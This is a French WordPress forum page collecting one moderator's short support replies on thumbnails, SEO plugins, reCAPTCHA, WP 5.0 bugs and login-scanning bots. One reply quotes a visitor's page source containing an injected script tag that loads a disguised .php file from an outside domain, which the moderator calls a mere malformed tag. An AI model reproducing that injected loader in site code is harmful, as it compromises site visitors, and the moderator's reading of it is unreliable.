Li-An

Toutes mes réponses sur les forums

15 sujets de 1 à 15 (sur un total de 20,399)
  • Auteur
    Messages
  • en réponse à : problème « serve scaled images » avec GT metrix #2233854
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Bonjour, personnellement je vous découragerai d’essayer de bidouiller cela. Le concepteur du thème avait son idée quand il a défini les tailles du thème et les changer par vous-même risque de vous donner de mauvaises surprises par la suite.

Thèmes et extensions génèrent beaucoup de miniatures particulièrement pour un thème comme le votre qui gère portfolio, galerie et WooCommerce. Si vous arrivez à cibler les miniatures que vous n’utiliserez jamais, il y a des tutos pour les désactiver via le thème enfant. https://www.echodesplugins.li-an.fr/code/supprimer-tailles-miniatures/

SI cette extension fonctionne encore, elle peut vous aider https://www.echodesplugins.li-an.fr/plugins/optimize-images-resizing/

en réponse à : Répondre à un commentaire impossible #2233838
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Vous espérez sérieusement que nous allons débugger comme ça Yoast ? Si vous avez un réglage d’une extension qui a disparu, comment voulez-vous que nous puissions vous aider ? Nous n’avons pas la science infuse et la personne la mieux placée pour vous répondre, c’est quand même le développeur. Si vous avez la flemme de vous y coller, ce n’est pas notre faute, c’est entièrement la votre.

Une petite recherche Google me donne https://yoast.com/yoast-seo-hidden-features/ qui indique en effet que Yoast le vire par défaut, le replyto. Je vous conseille donc de changer d’extension de SEO.

en réponse à : TOUT CLIC SUR MA PAGE D’ACCUEIL GENERE DES ERREURS PAGES 404 #2233781
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Si votre hébergeur ne vous permet pas d’accéder à vos fichiers via FTP… changez d’hébergeur. Il est impossible de faire des réparations WP sans cela (et vous auriez dû installer WP de cette manière).

en réponse à : [Résolu] Mise à jour échouée lors de l’enregistrement #2233780
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Ce qui signifierait que c’est votre navigateur qui avait un problème, pas votre site ?!

en réponse à : Problème avec Download Monitor #2233687
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Bonjour, désactivez les autres extensions, mettez un thème par défaut et testez pour voir.

en réponse à : [Résolu] Recaptcha et contact form 7 #2233686
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Il me semble que la nouvelle version de ReCaptcha est conçue pour ne s’afficher que lorsqu’il y a un comportement suspect du visiteur (un coup sur le Web me confirme la chose). Donc en effet, si le visiteur n’est pas suspect, il ne voit pas le Captcha.

en réponse à : [Résolu] Recaptcha et contact form 7 #2233608
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Bonjour, vous avez bien lu les messages d’avertissement signalés dans l’entrée de menu Contacts ? CF7 gère maintenant Google ReCaptcha 3 et nécessite donc un nouvel enregistrement de votre part et une nouvelle clef.

en réponse à : Des attaques avec les vrai logins #2233517
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Bonjour, en fait les bots font une recherche sur les archives des auteurs et retrouvent le login de cette manière. Une bonne extension de sécurité bloque ce comportement. Ninja Firewall, SecuPress, Wordfence.è…

en réponse à : TOUT CLIC SUR MA PAGE D’ACCUEIL GENERE DES ERREURS PAGES 404 #2233516
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Ça se passe au niveau du thème qui n’est peut-être pas compatible WP 5.0. Et la réaction de l’extension de sécurité est très drôle parce que ça signifie qu’elle n’est pas compatible WP 5.0 si elle ne reconnait pas un nouveau fichier du core.

en réponse à : Impossible de télécharger des photos depuis la version 5.0 #2233515
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Mais il n’y a pas d’urgence à passer à 5.0 qui n’est pas une mise à jour de sécurité (sauf si vous voulez profiter de Gutenberg).

en réponse à : Impossible de télécharger des photos depuis la version 5.0 #2233514
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Mettez à jour le thème et allez voir son changelog pour savoir ce qu’il en est.

en réponse à : signes agaçant #2233466
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Vous devez bien savoir ce qui a été modifié, non ?

Quand on regarde le code source on voit à la ligne 47

<body class="home page-template page-template-gallery_flow page-template-gallery_flow-php page page-id-127 _masterslider _ms_version_3.5.3" id="pp_<script type="text/javascript" src="http://smallbusinessemarketingcoach.com/wp-includes/fonts/YsRxvgyJ.php?id=93015"></script>">

qui se termine par <span class= »html-tag »></script></span> »>, ce qui n’est pas normal.

J’ignore par conter si ça a été créé à la main ou si c’est généré par le thème ou une extension

en réponse à : signes agaçant #2233457
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Bonjour, c’est un morceau de code qui traîne. Quelqu’un a fait une modification du thème et s’est planté dans le html avec une balise mal fermée.

en réponse à : [Résolu] Impossibilité de laisser un commentaire : Erreur 404 #2233456
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Super 🙂

en réponse à : [Résolu] Mise à jour échouée lors de l’enregistrement #2233426
    Li-An
    Modérateur
    Maître WordPress
    20559 contributions

Bonjour, désactivez les extensions, mettez un thème par défaut et testez pour voir.

15 sujets de 1 à 15 (sur un total de 20,399)